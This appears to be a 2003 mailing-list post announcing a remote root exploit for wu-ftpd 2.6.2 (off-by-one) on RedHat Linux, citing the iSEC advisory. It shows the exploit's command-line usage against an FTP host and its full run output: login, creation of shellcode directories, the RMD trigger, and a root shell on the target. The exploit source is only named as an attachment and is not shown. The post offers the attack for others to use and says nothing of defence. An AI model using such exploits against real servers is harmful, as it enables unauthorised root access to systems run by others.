I succeeded on RedHat Linux (x86) wu-2.6.2(1), 2.6.2(2), 2.6.1, 2.6.0. (Most versions).
This is never fake.

An excellent advisory was already announced (2003/07/31):
http://isec.pl/vulnerabilities/isec-0011-wu-ftpd.txt

This information was very useful to me. I'm thankful to them.

This works well on my server. What if it doesn't work on your server?
The reasons it doesn't work on other servers are of various kinds.
(For example, compiler version, operating system kind, or a mistake in the
shellcode's position, environment variables, etc ...)
I don't think about those. Exert your force. :-)

INetCop Security is poor now. They have a few servers.

* Exploit result:

--
bash$ cat /etc/redhat-release
Red Hat Linux release 6.1 (Cartman)
bash$ gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs
gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)
--
bash$ ./0x82-wu262 -htest.inetcop.org -ux82 -pmy_pass -n21 -t2

 0x82-WOOoou~Happy_new - wu-ftpd v2.6.2 off-by-one remote exploit.

 [*] Target: RedHat Linux 6.x Version wu-2.6.2(2) compile.
 [+] address: 0x806aaf0.
 [*] #1 Try, test.inetcop.org:21 ... [ OK ]

 [1] ftpd connection login.
 [*] ftpd connection success.
 [+] User id input.
 [+] User password input.
 [*] User x82 logged in.

 [2] send exploit code.
 [+] 01: make 0x41414141 directory.
 [+] 02: make shell-code directory.
 [+] 03: make 0x43434343 directory.
 [+] 04: make 0x44444444 directory.
 [+] 05: make 0x45454545 directory.
 [+] 06: make 0x46464646 directory.
 [+] 07: make 0x47474747 directory.
 [+] 08: make 0x48484848 directory.
 [+] 09: make 0x49494949 directory.
 [+] 10: make 0x50505050 directory.
 [+] 11: make 0x51515151 directory.
 [+] 12: make 0x52525252 directory.
 [+] 13: make 0x53535353 directory.
 [+] 14: make 0x54545454 directory.
 [+] 15: make 0x55555555 directory.
 [+] Ok, MKD &shellcode_dir.
 [+] #2 Try, test.inetcop.org:21 ... [ OK ]

 [3] ftpd connection login.
 [*] ftpd connection success.
 [+] User id input.
 [+] User password input.
 [*] User x82 logged in.

 [4] send exploit code.
 [+] 01: make 0x41414141 directory.
 [+] 02: make shell-code directory.
 [+] 03: make 0x43434343 directory.
 [+] 04: make 0x44444444 directory.
 [+] 05: make 0x45454545 directory.
 [+] 06: make 0x46464646 directory.
 [+] 07: make 0x47474747 directory.
 [+] 08: make 0x48484848 directory.
 [+] 09: make 0x49494949 directory.
 [+] 10: make 0x50505050 directory.
 [+] 11: make 0x51515151 directory.
 [+] 12: make 0x52525252 directory.
 [+] 13: make 0x53535353 directory.
 [+] 14: make 0x54545454 directory.
 [+] 15: make 0x55555555 directory.
 [+] Ok, RMD &shellcode_dir.

 [5] Waiting, execute the shell ...
 [*] Send, command packet !

x82 is happy, x82 is happy, x82 is happy
Linux test.inetcop.org 2.2.12-20kr #1 Tue Oct 12 16:46:36 KST 1999 i686 unknown
uid=0(root) gid=0(root) egid=501(x82) groups=501(x82),500(secure)
bash#
--

P.S: Please don't mail me questions about the exploit.
Sorry for my poor English.
Attachment:
0x82-wu262.c
Description: Binary data